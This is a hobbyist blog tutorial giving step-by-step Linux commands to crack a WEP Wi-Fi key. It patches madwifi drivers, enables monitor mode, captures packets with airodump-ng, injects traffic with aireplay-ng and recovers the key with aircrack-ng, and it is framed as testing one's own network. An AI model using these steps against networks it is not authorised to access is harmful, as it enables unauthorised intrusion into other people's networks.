Step by step (n00b friendly) instructions to crack your own WEP encryption key using Linux and Atheros based wifi card.


Note: Don’t use this information to crack someone else’s Wifi access point because chances are it’s illegal where you reside. I take no responsability with what you do with this information. You have been warned.


WEP encryption is very poor. If your Wifi card supports “Monitoring mode”, it’s possible to capture packets that are broadcasted by any router. Given that you have captured enough encrypted packets, there is a software you can use that will deduce the WEP encryption key based on all the received packets.

The problem is that if there isn’t much data being transferred on your network, it may take a very long time to capture enough packets to extract the WEP key. Sometimes 30,000 packets are enough, other times you might need up to 2,000,000 packets. The solution to this problem is that it’s possible for you to “inject” packets into the network and have the router respond back with more packets, that will speed up the process a lot!

Several Wifi cards support “Monitoring mode” and packet injection, but don’t have it enabled by default. To enable it, you must download a special driver patch distributed by aircrack-ng. I will explain here how I did it with my atheros card.

Instructions to install aircrack-ng on Prism2, PrismGT (FullMAC), Broadcom (with the b43 driver), RTL8180, RTL8187, Ralink, ACX1xx and Zydas:

Note: I might not always have the proper terminology. I am not a hacker and I don’t claim to be one. I’m just a guy with too much time on my hands. Don’t quote this documents on your master thesis on network security.

Step by step instructions:

Step 1: Install Linux on your computor. I installed Ubuntu because it’s pretty.

Step 2: Create a folder in your home directory, download the madwifi-ng driver source.

cd /home/MYHOMEDIR
mkdir playground
cd playground
svn checkout madwifi-ng

Step 3: Download the aircrack-ng driver patch and patch the madwifi driver source.

cd madwifi-ng
patch -Np1 -i ../madwifi-ng-r3745.patch

Step 4: Compile the patched madwifi drivers.

sudo make

Step 5: Unload the wifi drivers from memory.

sudo ./scripts/madwifi-unload

Step 6: Delete the former drivers from the kernel modules folder

I had to do this to install the patched drivers, don’t worry, the patched madwifi drivers also allow you to connect to the Internet normally.

NOTE: Chances are that your drivers are not in the same directory than mine are. If you’re using Ubuntu, they will be in /lib/modules/XXXXX/net/, replace XXXXX with the version of the kernel you are using, if you’re not sure, do ls /lib/modules and it will show you the list of folders.

sudo rm /lib/modules/2.6.24-19-generic/net/ath*

Step 7: Install the patched drivers.

sudo make install

Step 8: Reboot your computor

Step 9: Install aircrack-ng

Using Ubuntu, from repository:

sudo apt-get install aircrack-ng

Instructions to install from source:

Step 10: Test the drivers and see if the card can get in monitor mode. Activate monitoring mode.

If the test is successful, go to the next step.
If the test is unsuccessful, give up (or don’t).

Do this: (replace ath0 with your interface name, replace PATHWHEREICOMPILEDMADWIFI with the path where you compiled madwifi. It’s most likely /home/MYHOMEDIR/playground/madwifi-ng/ if you followed the instructions)

sudo -s
modprobe ath_pci
modprobe ath_hal
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

The above should give no errors. Then check out if your card is in monitor mode


It should return something like this: The most important is that it says Mode:Monitor

ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:16 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-94 dBm Noise level=-94 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Step 11: Note the information you need to crack your wifi access point.

The information you will need is:
-The router’s BSSID (router MAC)
-The channel on which the router broadcasts.

There are a few ways to get this. The easiest and coolest way is to use Kismet because it’s got a very cool looking interface, and it provides detailed information about neighbouring wifi networks. You will impress girls if you decide to use Kismet. However, Kismet doesn’t work on my computer anymore so I’m not going to talk about it.

I know that my wifi access point broadcasts on channel 6, so I launched airdump and started recording all packets sent over channel 6. Let airdump run in a seperate terminal because you will need to record as many packets as possible to crack the WEP key. Here is the command: (replace FILENAME with whatever you want, and CHANNEL with the channel the wireless access point broadcasts on)

sudo airodump-ng –ivs -w FILENAME -c CHANNEL ath0

The airdump window gives out very useful information: The router’s BSSID, the wifi access point name, whether the Wifi network is using WEP (THIS WILL NOT WORK IF THE NETWORK USES WPA), and if you monitor for a little while it might show you the SSID of some of the clients connected to the router.

Note all that information down.

Step 12: Inject packets
In airdump: If the wireless access point’s #Data value increases really fast (so fast that it could get to 1,000,000 really quickly), skip to the next step. If it’s not moving much, you will need to stimulate the router using packet injection. There are many ways to do this, here is the way I do it:

In a seperate terminal window, launch aireplay

sudo aireplay-ng -b BSSID -x 100 -2 INTERFACE

-BSSID is the router’s MAC address in this format: 00:00:00:00:00:00
-INTERFACE is you wifi card’s interface name. Since I have an atheros card, mine is ath0. If you don’t know what it is, uou should have already given up.
-x 100 means that you don’t want to send more than 100 packets per second (You can change this. If you set this too high, your computor will crash. I think 100 is good enough, it won’t necessarely go faster with 200 packets per second)
-2 means use injection method 2

Then Aireplay will look for packets it can use. It will say “read xxxx packets” and eventually show you a packet and ask you “Use this packet?” hit “y” to use it and “n” to see another one. You will have to learn with trial and error. If you use a packet that results in airodump intercepting a lot of data, you will see the #Data value increase really fast in airodump, if the #Data doesn’t change or increases slowly, hit “CTRL-C” and you will be shown another packet.

Once it starts increasing really fast, go to the next step.

From my experience, packets that look like this don’t work:

.(2 …..w..`…

And ones that have less data like this work better:

< ………..zh.)o
-… U._w.~C.
.Q.” ‘. [.me.”.
….x/i …. I.`…
.*#)., :.$u. .=

Note: It’s quite possible that airodump or aireplay crash, if they do, kill the processes and launch them once again. The data collected with airodump will remain in the folder and will not be overwritten.

Step 13: Get your WEP key!
While airodump collects packets and aireplay injects packets, launch airecrack, it will automatically try to crack the WEP key, if it fails, it will automatically wait for more data and try again: Replace BSSID with the access point’s BSSID.

aircrack-ng -a 1 -n 128 -b BSSID *.ivs

Drink beer until it finds the WEP key.

Here’s a screenshot of airodump-ng, aireplay-ng and airecrack-ng in action: Good luck!

aircrack-ng screenshot

aircrack-ng screenshot

OMG Somewhat Related Crap From This Site LOL

Leave a comment

You must be logged in to post a comment.